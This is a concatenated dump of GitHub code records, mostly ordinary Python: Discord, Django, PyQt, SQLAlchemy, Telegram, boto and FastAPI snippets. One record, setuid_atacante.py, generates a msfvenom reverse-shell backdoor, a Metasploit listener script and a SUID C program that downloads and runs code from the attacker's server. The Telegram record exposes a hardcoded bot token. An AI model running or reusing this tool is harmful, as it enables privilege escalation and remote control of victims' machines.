bank.withdraw_credits(amount=_range, member=ctx.author)\n message\n except ValueError:\n await ctx.send(\n \"You would've lost money on this payday, but you have nothing to lose! \"\n )\n await bank.set_balance(member=ctx.author, amount=0)\n else:\n try:\n await bank.deposit_credits(amount=_range, member=ctx.author)\n except bank.errors.BalanceTooHigh as e:\n await bank.set_balance(ctx.author, e.max_balance)\n", "repo_name": "OofChair/OofCogs", "sub_path": "advancedeconomy/advancedeconomy.py", "file_name": "advancedeconomy.py", "file_ext": "py", "file_size_in_byte": 8482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Literal", "line_number": 13, "usage_type": "name"}, {"api_name": "redbot.core.commands.Cog", "line_number": 33, "usage_type": "attribute"}, {"api_name": "redbot.core.commands", "line_number": 33, "usage_type": "name"}, {"api_name": "redbot.core.bot.Red", "line_number": 46, "usage_type": "name"}, {"api_name": "redbot.core.config.Config.get_conf", "line_number": 48, "usage_type": "call"}, {"api_name": "redbot.core.config.Config", "line_number": 48, "usage_type": "name"}, {"api_name": "redbot.core.bank.set_global", "line_number": 68, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 68, "usage_type": "name"}, {"api_name": "redbot.core.commands.group", "line_number": 76, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 76, "usage_type": "name"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 77, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 77, "usage_type": "name"}, {"api_name": "redbot.core.commands.is_owner", "line_number": 78, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 78, "usage_type": "name"}, {"api_name": "redbot.core.commands.Context", "line_number": 86, "usage_type": "attribute"}, {"api_name": "redbot.core.commands", "line_number": 86, "usage_type": "name"}, {"api_name": "redbot.core.commands.Context", "line_number": 100, "usage_type": "attribute"}, {"api_name": "redbot.core.commands", "line_number": 100, "usage_type": "name"}, {"api_name": "discord.ext.commands.core.cooldown", "line_number": 106, "usage_type": "name"}, {"api_name": "discord.ext.commands.core.cooldown", "line_number": 109, "usage_type": "argument"}, {"api_name": "discord.Embed", "line_number": 117, "usage_type": "call"}, {"api_name": "redbot.core.commands.Context", "line_number": 133, "usage_type": "attribute"}, {"api_name": "redbot.core.commands", "line_number": 133, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 142, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 142, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 147, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 147, "usage_type": "attribute"}, {"api_name": "redbot.core.bank.get_currency_name", "line_number": 150, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 150, "usage_type": "name"}, {"api_name": "redbot.core.bank.get_balance", "line_number": 151, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 151, "usage_type": "name"}, {"api_name": "redbot.core.bank.deposit_credits", "line_number": 153, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 153, "usage_type": "name"}, {"api_name": "redbot.core.bank.errors", "line_number": 154, "usage_type": "attribute"}, {"api_name": "redbot.core.bank", "line_number": 154, "usage_type": "name"}, {"api_name": "redbot.core.bank.set_balance", "line_number": 155, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 155, "usage_type": "name"}, {"api_name": "redbot.core.bank.get_balance", "line_number": 156, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 156, "usage_type": "name"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 159, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 163, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 179, "usage_type": "attribute"}, {"api_name": "redbot.core.bank.get_balance", "line_number": 183, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 183, "usage_type": "name"}, {"api_name": "redbot.core.commands.command", "line_number": 131, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 131, "usage_type": "name"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 132, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 132, "usage_type": "name"}, {"api_name": "redbot.core.bank.get_balance", "line_number": 194, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 194, "usage_type": "name"}, {"api_name": "redbot.core.bank.get_currency_name", "line_number": 195, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 195, "usage_type": "name"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 196, "usage_type": "call"}, {"api_name": "redbot.core.commands.command", "line_number": 188, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 188, "usage_type": "name"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 189, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 189, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 205, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 206, "usage_type": "call"}, {"api_name": "redbot.core.bank.get_currency_name", "line_number": 207, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 207, "usage_type": "name"}, {"api_name": "redbot.core.bank.withdraw_credits", "line_number": 213, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 213, "usage_type": "name"}, {"api_name": "redbot.core.bank.set_balance", "line_number": 219, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 219, "usage_type": "name"}, {"api_name": "redbot.core.bank.deposit_credits", "line_number": 222, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 222, "usage_type": "name"}, {"api_name": "redbot.core.bank.errors", "line_number": 223, "usage_type": "attribute"}, {"api_name": "redbot.core.bank", "line_number": 223, "usage_type": "name"}, {"api_name": "redbot.core.bank.set_balance", "line_number": 224, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 224, "usage_type": "name"}, {"api_name": "redbot.core.commands.command", "line_number": 198, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 198, "usage_type": "name"}, {"api_name": "redbot.core.commands.cooldown", "line_number": 199, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 199, "usage_type": "name"}, {"api_name": "redbot.core.commands.BucketType", "line_number": 199, "usage_type": "attribute"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 200, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 200, "usage_type": "name"}]} +{"seq_id": "22851795837", "text": "from django.urls import path\nfrom django.urls.resolvers import URLPattern\nfrom .views import(\n DealerListView,\n DealerDetailView,\n)\n\napp_name = 'dealers'\nurlpatterns = [\n path('', DealerListView.as_view(), name='dealer_list'),\n path('/', DealerDetailView.as_view(), name='dealer_detail'),\n]", "repo_name": "Avineswaran/project2django", "sub_path": "Ecommerce/dealer/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 310, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.DealerListView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.DealerListView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.DealerDetailView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.DealerDetailView", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "38353238253", "text": "# -*- coding: utf-8 -*-\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nimport sys\nfrom vegatables import Ui_MainWindow\nfrom jiamubiao import *\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow,Programme_jiamu):\n\n\tstartdatelist = [None,None,None]\n\tenddatelist = [None,None,None]\n\tstrtext = None\n\tdef __init__(self, parent=None):\n\t\tsuper(MainWindow, self).__init__(parent)\n\t\tself.setupUi(self)\n\n\t\tself.starttime.dateChanged['QDate'].connect(self.startdate)\n\t\tself.endtime.dateChanged['QDate'].connect(self.enddate)\n\t\tself.filename.textEdited['QString'].connect(self.setfilename)\n\t\tself.pushButton.clicked.connect(self.createxcel)\n\t\tself.pushButton_2.clicked.connect(self.close)\n\n\tdef startdate(self,QDate):\n\t\tdatetuple = QDate.getDate()\n\t\tself.startdatelist[0] = int(datetuple[0])\n\t\tself.startdatelist[1] = int(datetuple[1])\n\t\tself.startdatelist[2] = int(datetuple[2])\n\n\tdef enddate(self,QDate):\n\t\tdatetuple = QDate.getDate()\n\t\tself.enddatelist[0] = int(datetuple[0])\n\t\tself.enddatelist[1] = int(datetuple[1])\n\t\tself.enddatelist[2] = int(datetuple[2])\n\tdef setfilename(self,strtext):\n\t\tself.strtext = strtext + \".xls\"\n\tdef createxcel(self):\n\t\tif self.strtext is not None:\n\t\t\tProgramme_jiamu.get_html(self,self.startdatelist,self.enddatelist,self.strtext)\n\t\t\tQtWidgets.QMessageBox.information(self.pushButton,\"标题\",\"Excel生成成功\")\n\t\telse:\n\t\t\tQtWidgets.QMessageBox.information(self.pushButton,\"标题\",\"请输入文件名\")\n\n\n\n\n\nif __name__ == \"__main__\":\n\tapp = QtWidgets.QApplication(sys.argv)\n\tmyWindow = MainWindow()\n\tmyWindow.show()\n\tsys.exit(app.exec_())\t \n", "repo_name": "VanJason/Crawl_for_gzvegatable", "sub_path": "gzvg.py", "file_name": "gzvg.py", "file_ext": "py", "file_size_in_byte": 1618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "vegatables.Ui_MainWindow", "line_number": 10, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.information", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 41, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.information", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 50, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 50, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "45183678007", "text": "from logging import getLogger\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.engine.reflection import Inspector\nfrom sqlalchemy.ext.declarative import declarative_base as sa_declarative_base\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.schema import (\n MetaData,\n Table,\n DropTable,\n ForeignKeyConstraint,\n DropConstraint,\n )\nfrom zope.component import getSiteManager\nfrom zope.sqlalchemy import register\nfrom zope.sqlalchemy.datamanager import STATUS_CHANGED\n\nfrom .interfaces import ISession\n\nlogger = getLogger('mortar_rdb')\n\ndef register_session(url=None,\n name=u'',\n engine=None,\n echo=None,\n transactional=True,\n scoped=True,\n twophase=True):\n \"\"\"\n Create a :class:`~sqlalchemy.orm.session.Session` class and\n register it for later use.\n\n Generally, you'll only need to pass in a :mod:`SQLAlchemy`\n connection URL. If you want to register multiple sessions for a\n particular application, then you should name them.\n If you want to provide specific engine configuration, then you can\n pass in an :class:`~sqlalchemy.engine.base.Engine` instance.\n In that case, you must not pass in a URL.\n\n :param echo: If `True`, then all SQL will be echoed to the python\n logging framework. This option cannot be specified if you pass in\n an engine.\n\n :param scoped: If `True`, then :func:`get_session` will return a distinct\n session for each thread that it is called from but, within that thread,\n it will always return the same session. If it is `False`, every call\n to :func:`get_session` will return a new session.\n \n :param transactional:\n\n If `True`, a :mod:`SQLAlchemy` extension will\n be used that that enables the :mod:`transaction` package to\n manage the lifecycle of the SQLAlchemy session (eg:\n :meth:`~sqlalchemy.orm.session.Session.begin`/:meth:`~sqlalchemy.orm.session.Session.commit`/:meth:`~sqlalchemy.orm.session.Session.rollback`).\n This can only be done when scoped sessions are used.\n\n If `False`, you will need to make sure you call\n :meth:`~sqlalchemy.orm.session.Session.begin`/:meth:`~sqlalchemy.orm.session.Session.commit`/:meth:`~sqlalchemy.orm.session.Session.rollback`,\n as appropriate, yourself. \n\n :param twophase: By default two-phase transactions are used where\n supported by the underlying database. Where this causes problems,\n single-phase transactions can be used for all engines by passing this\n parameter as `False`.\n\n \"\"\"\n if (engine and url) or not (engine or url):\n raise TypeError('Must specify engine or url, but not both')\n\n if transactional and not scoped:\n raise TypeError(\n 'Transactions can only be managed when using scoped sessions'\n )\n \n if engine:\n if echo:\n raise TypeError('Cannot specify echo if an engine is passed')\n else:\n engine = create_engine(url, echo=echo)\n\n logger.info('Registering session for %r with name %r',\n engine.url, name)\n\n params = dict(\n bind = engine,\n autoflush=True,\n autocommit=False,\n )\n\n if transactional:\n if twophase and engine.dialect.name in ('postgresql', 'mysql'):\n params['twophase']=True\n\n Session = sessionmaker(**params)\n \n if scoped:\n Session = scoped_session(Session)\n\n if transactional:\n register(Session, initial_state=STATUS_CHANGED)\n \n getSiteManager().registerUtility(\n Session,\n provided=ISession,\n name=name,\n ) \n\ndef drop_tables(engine):\n \"\"\"\n Drop all the tables in the database attached to by the supplied\n engine.\n \n As many foreign key constraints as possible will be dropped\n first making this quite brutal!\n \"\"\"\n # from http://www.sqlalchemy.org/trac/wiki/UsageRecipes/DropEverything\n conn = engine.connect()\n\n inspector = Inspector.from_engine(engine)\n\n # gather all data first before dropping anything.\n # some DBs lock after things have been dropped in \n # a transaction.\n metadata = MetaData()\n\n tbs = []\n for table_name in inspector.get_table_names():\n fks = []\n for fk in inspector.get_foreign_keys(table_name):\n if not fk['name']:\n continue\n fks.append(\n ForeignKeyConstraint((),(),name=fk['name'])\n )\n t = Table(table_name, metadata,*fks)\n tbs.append(t)\n for fkc in fks:\n conn.execute(DropConstraint(fkc, cascade=True))\n\n for table in tbs:\n conn.execute(DropTable(table))\n\ndef get_session(name=u''):\n \"\"\"\n Return a :class:`~sqlalchemy.orm.session.Session` instance from\n the current registry as registered with the supplied `name`.\n \"\"\"\n return getSiteManager().getUtility(ISession,name)()\n\n_bases = {}\n\ndef declarative_base(**kw):\n \"\"\"\n Return a :obj:`Base` as would be returned by\n :func:`~sqlalchemy.ext.declarative.declarative_base`.\n\n Only one :obj:`Base` will exist for each combination of parameters\n that this function is called with. If it is called with the same\n combination of parameters more than once, subsequent calls will\n return the existing :obj:`Base`.\n\n This method should be used so that even if more than one package\n used by a project defines models, they will all end up in the\n same :class:`~sqlalchemy.schema.MetaData` instance and all have the\n same declarative registry.\n \"\"\"\n key = tuple(kw.items())\n if key in _bases:\n return _bases[key]\n base = sa_declarative_base(**kw)\n _bases[key] = base\n return base\n", "repo_name": "Mortar/mortar_rdb", "sub_path": "mortar_rdb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 5830, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 79, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 94, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.scoped_session", "line_number": 97, "usage_type": "call"}, {"api_name": "zope.sqlalchemy.register", "line_number": 100, "usage_type": "call"}, {"api_name": "zope.sqlalchemy.datamanager.STATUS_CHANGED", "line_number": 100, "usage_type": "name"}, {"api_name": "zope.component.getSiteManager", "line_number": 102, "usage_type": "call"}, {"api_name": "interfaces.ISession", "line_number": 104, "usage_type": "name"}, {"api_name": "sqlalchemy.engine.reflection.Inspector.from_engine", "line_number": 119, "usage_type": "call"}, {"api_name": "sqlalchemy.engine.reflection.Inspector", "line_number": 119, "usage_type": "name"}, {"api_name": "sqlalchemy.schema.MetaData", "line_number": 124, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.ForeignKeyConstraint", "line_number": 133, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.Table", "line_number": 135, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.DropConstraint", "line_number": 138, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.DropTable", "line_number": 141, "usage_type": "call"}, {"api_name": "interfaces.ISession", "line_number": 148, "usage_type": "argument"}, {"api_name": "zope.component.getSiteManager", "line_number": 148, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 170, "usage_type": "call"}]} +{"seq_id": "20369891461", "text": "from telegram.ext import Updater, CommandHandler\r\n\r\n\r\ndef send_poll(update, context):\r\n context.bot.send_poll(chat_id=update.effective_chat.id,\r\n question=\"where are you from ?\",\r\n options=[\r\n \"Uzbekistan\",\r\n \"USA\",\r\n \"UK\"\r\n ])\r\n\r\n\r\ndef runner():\r\n updater = Updater(token=\"5333086108:AAGOz98WcjgaJ5SEg208C_XS7rYVZJ8-eT4\")\r\n dispatcher = updater.dispatcher\r\n\r\n dispatcher.add_handler(CommandHandler('start', send_poll))\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\"ishga tushdi ...\")\r\n runner()", "repo_name": "IqrorjonCoder/all-telegrambot-functions", "sub_path": "learn/context/bot/send_poll.py", "file_name": "send_poll.py", "file_ext": "py", "file_size_in_byte": 721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "telegram.ext.Updater", "line_number": 15, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "4234335425", "text": "import boto3,boto.ec2\n\ndef create_instance():\n\n script = '''\n #!/bin/sh\n yum -y install httpd\n systemctl enable httpd\n systemctl start httpd.service\n\n mkdir dist\n cd dist\n wget https://lapy113.s3.amazonaws.com/dist.zip\n unzip dist.zip\n cd dist\n\n cp -r * /var/www/html \n '''\n\n try:\n resource_ec2 = boto3.resource('ec2')\n response = resource_ec2.create_instances(\n ImageId='ami-0c2b8ca1dad447f8a',\n MinCount=1,\n MaxCount=1,\n InstanceType='t2.micro',\n KeyName='CS351-SG1',\n SecurityGroups=['launch-wizard-1'],\n UserData=script\n )\n print(response)\n instance = response[0]\n print('Instance created.. waiting to be in running state')\n instance.wait_until_running()\n print('Instance in running.')\n \n print('public dns address: ', get_public_ip(instance))\n \n except Exception as e:\n print(e)\n\ndef start_ec2_instance() :\n try:\n resource_ec2 = boto3.client('ec2')\n instance_id = resource_ec2.describe_instances()['Reservations'][0]['Instances'][0]['InstanceId']\n # instance_id = 'i-0cc89f742692b78c8'\n resource_ec2.start_instances(InstanceIds=[instance_id])\n except Exception as e:\n print(e)\n\ndef get_public_ip(inst):\n client = boto3.client('ec2')\n response = client.describe_instances(InstanceIds=[inst.instance_id])\n public_ipvp4 = response['Reservations'][0]['Instances'][0]['PublicIpAddress']\n return public_ipvp4\n\n# start_ec2_instance()\ncreate_instance()", "repo_name": "lapy113/Cloud-Computing", "sub_path": "ASSIGNMENT 2/BOTO/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "boto3.resource", "line_number": 21, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 44, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "35594400977", "text": "from sqlalchemy.orm import Session\n\nfrom . import router, user_repo\nfrom fastapi import Depends\n\nfrom app.depends import get_current_user, get_db\nfrom app.schemas.user_schema import UserProfile, UserOut\n\n\n@router.get('/profile', summary='Get details of currently logged in user', response_model=UserProfile)\nasync def profile(user: UserOut = Depends(get_current_user), db: Session = Depends(get_db)):\n user_profile = user_repo.get_user_by_id(db, user_id=user.id)\n return UserProfile(\n id=user_profile.id,\n email=user_profile.email,\n username=user_profile.username,\n profile_photo=user_profile.profile_photo,\n registered_at=user_profile.registered_at,\n is_active=True,\n is_superuser=user.is_superuser,\n is_moderator=user.is_moderator\n )\n", "repo_name": "arystambek-dimash/tolqyn", "sub_path": "app/routers/user_router/router_profile.py", "file_name": "router_profile.py", "file_ext": "py", "file_size_in_byte": 801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "app.schemas.user_schema.UserOut", "line_number": 11, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 11, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 11, "usage_type": "call"}, {"api_name": "app.depends.get_current_user", "line_number": 11, "usage_type": "argument"}, {"api_name": "app.depends.get_db", "line_number": 11, "usage_type": "argument"}, {"api_name": "app.schemas.user_schema.UserProfile", "line_number": 13, "usage_type": "call"}, {"api_name": "app.schemas.user_schema.UserProfile", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "36936807908", "text": "import os\ntry:\n from colorama import Fore\nexcept ImportError as e:\n os.system(\"pip install colorama\")\n\narchivo_rc = \"setuid_atacante.rc\"\ntipo_payload = \"linux/x86/meterpreter/reverse_tcp\"\ntipo_ejecutable = \"elf\"\nc = \"runscriptSUID.c\"\n\ndef obtener_ip_automaticamente(interfaz):\n comando = f\"ip address | grep {interfaz} | grep inet | awk '\"\"{print $2}\"\"' | head -n 1 > ip.txt\"\n os.system(comando)\n ip = open(\"ip.txt\",\"r\").readlines()\n os.system(\"rm ip.txt\")\n return ip[0].split('/')[0].strip()\n\ndef pedir_dato(enun):\n informar(enun)\n retorno = str(input(f\"{Fore.GREEN} ==> \"))\n return retorno\n\ndef informar(enun):\n print(f\"{Fore.CYAN}==========================================================================================\")\n print(f\"{Fore.RED}[!] {enun}\".upper())\n print(f\"{Fore.CYAN}==========================================================================================\")\n\ndef crear_backdoor(ip_local, puerto_escucha):\n payload = pedir_dato(\"INTRODUCE EL NOMBRE DEL PAYLOAD SIN EXTENSION\")\n os.system(f\"msfvenom -p {tipo_payload} LHOST={ip_local} LPORT={puerto_escucha} -f {tipo_ejecutable} -o .{payload}.{tipo_ejecutable}\")\n informar(f\"BACKDOOR GENERADO COMO : .{payload}.{tipo_ejecutable}\")\n return payload \n\ndef levantar_servidor():\n os.system(\"xterm -e sudo python3 -m http.server 80 &\")\n\ndef escribir_rc(ordenes_rc):\n informar(\"Creando Archivo RC ...\")\n for orden in ordenes_rc:\n print(f\"{Fore.BLUE}{orden}\")\n os.system(f\"echo {orden} >> {archivo_rc}\")\n\n informar(f\"{archivo_rc} GENERADO CON EXITO\")\n\ndef escribir_archivo(servidor, archivo):\n codigo = \"\"\"#include \n#include \n#include \n#include \n\nint main(){\n setuid(0);\n system(\"wget http://\"\"\" + servidor + \"\"\"/setuid_victima.py\");\n system(\"python3 setuid_victima.py -r \"\"\" + servidor + \"\"\" -e \"\"\" + archivo + \"\"\" -x \"\"\" + tipo_ejecutable + \"\"\" \");\n return 0;\n}\n\"\"\"\n f = open(c , \"w\")\n f.write(codigo)\n f.close()\n\ndef lanza_metasploit():\n os.system(f\"msfconsole -q -r {archivo_rc}\")\n\ndef configurar_archivo(ip, payload):\n informar(\"Generando Archivo C \")\n escribir_archivo(ip, payload)\n os.system(f\"cat {c}\")\n conf = pedir_dato(f\"Desea modificar el archivo {c} antes de compilarlo ? [S/n] \")\n if len(conf) == 0 or conf[0].upper() == \"S\":\n os.system(f\"nano {c}\")\n informar(f\"COMPILANDO {c} a SUID\")\n os.system(f\"gcc {c} -o SUID\")\n informar(f\"Eliminando {c}\")\n os.system(f\"rm {c}\")\n\ndef main():\n interfaz = pedir_dato(\"INTRODUCE la interfaz conectada a internet\")\n ip = obtener_ip_automaticamente(interfaz)\n puerto = pedir_dato(\"INTRODUCE EL PUERTO A LA ESCUCHA DEL PAYLOAD\")\n informar(f\"IP DETECTADA : {ip}\")\n ordenes_rc = [\n \"use exploit/multi/handler\",\n f\"set PAYLOAD {tipo_payload}\",\n f\"set LHOST {ip}\",\n f\"set LPORT {puerto}\",\n \"exploit\"]\n escribir_rc(ordenes_rc)\n gen = pedir_dato(\"DESEA CREAR UN PAYLOAD?[S/n]\")\n if len(gen) == 0 or gen[0].upper() == \"S\":\n payload = crear_backdoor(ip, puerto)\n configurar_archivo(ip, payload)\n informar(\"NECESITO PERMISOS PARA LEVANTAR UN SERVIDOR WEB\")\n levantar_servidor()\n\n lanza_metasploit()\n informar(f\"LIMPIANDO {archivo_rc}\")\n os.system(f\"rm {archivo_rc}\")\n\nif __name__ == '__main__':\n main()\n", "repo_name": "AdrianGomezMartin/ExplotacionSUID", "sub_path": "setuid_atacante.py", "file_name": "setuid_atacante.py", "file_ext": "py", "file_size_in_byte": 3356, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.system", "line_number": 5, "usage_type": "call"}, {"api_name": "os.system", "line_number": 14, "usage_type": "call"}, {"api_name": "os.system", "line_number": 16, "usage_type": "call"}, {"api_name": "colorama.Fore.GREEN", "line_number": 21, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 21, "usage_type": "name"}, {"api_name": "colorama.Fore.CYAN", "line_number": 25, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 25, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 26, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 26, "usage_type": "name"}, {"api_name": "colorama.Fore.CYAN", "line_number": 27, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 27, "usage_type": "name"}, {"api_name": "os.system", "line_number": 31, "usage_type": "call"}, {"api_name": "os.system", "line_number": 36, "usage_type": "call"}, {"api_name": "colorama.Fore.BLUE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 41, "usage_type": "name"}, {"api_name": "os.system", "line_number": 42, "usage_type": "call"}, {"api_name": "os.system", "line_number": 64, "usage_type": "call"}, {"api_name": "os.system", "line_number": 69, "usage_type": "call"}, {"api_name": "os.system", "line_number": 72, "usage_type": "call"}, {"api_name": "os.system", "line_number": 74, "usage_type": "call"}, {"api_name": "os.system", "line_number": 76, "usage_type": "call"}, {"api_name": "os.system", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "16567000882", "text": "import pandas as pd\nfrom pathlib import Path\nimport numpy as np\n\nclass_num = 4\nlist_labels = [[] for i in range(class_num)]\n\ntrain_type = 'wide_angle'\ndata_version = 'v5'\n\ncsv_all = Path(__file__).parent.parent.absolute().joinpath('datafiles', data_version, 'all.csv')\ncsv_train = Path(__file__).parent.parent.absolute().joinpath('datafiles', data_version, 'train.csv')\ncsv_valid = Path(__file__).parent.parent.absolute().joinpath('datafiles', data_version, 'valid.csv')\ncsv_test = Path(__file__).parent.parent.absolute().joinpath('datafiles', data_version, 'test.csv')\n\n\ndf = pd.read_csv(csv_all)\n\nfor index, row in df.iterrows():\n list_tmp = row['labels'].split('_')\n for index, label in enumerate(list_tmp):\n list_labels[index].append(int(label))\n\nfor i in range(class_num):\n list_np = np.array(list_labels[i])\n print(f'class no:{i}')\n print(f'label 0:{np.sum(list_np == 0)}, label 0:{np.sum(list_np == 1)}')\n\n\nprint('OK')\n\n'''\n单纯性的格子样变性', '单纯性的孔源性视网膜脱离', '单纯性的视网膜破裂孔', '囊性视网膜突起'\nclass no:0\nlabel 0:5131, label 0:827\nclass no:1\nlabel 0:5005, label 0:953\nclass no:2\nlabel 0:4947, label 0:1011\nclass no:3\nlabel 0:5893, label 0:65\n'''\n", "repo_name": "linchundan88/WideAngleFundus", "sub_path": "train/my_label_distribution.py", "file_name": "my_label_distribution.py", "file_ext": "py", "file_size_in_byte": 1233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pathlib.Path", "line_number": 11, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "8357933268", "text": "# in this modiule the register is created and the data is then send to the DB.\n# this module provides callback function to the modules that registers.\n\n\nimport logging\nimport actuatordbmod\nimport sensordbmod\nimport statusdataDBmod\n\n\nlogger = logging.getLogger(\"hydrosys4.\"+__name__)\nREGISTER={}\n\ncallbacklist=[]\n\ndef register_input_value(name,value,saveonDB=True):\n print (\"register calls here\")\n statusdataDBmod.write_status_data(REGISTER,\"input\",name,value)\n for callback in callbacklist:\n print(\"start callback\")\n callback(\"input\",name,value)\n if saveonDB:\n sensordbmod.insertdataintable(name,value)\n\n\ndef register_output_value(name,value,saveonDB=True):\n statusdataDBmod.write_status_data(REGISTER,\"output\",name,value)\n for callback in callbacklist:\n callback(\"output\",name,value)\n if saveonDB:\n if value==\"ON\":\n value=\"1\"\n actuatordbmod.insertdataintable(name,value)\n\ndef 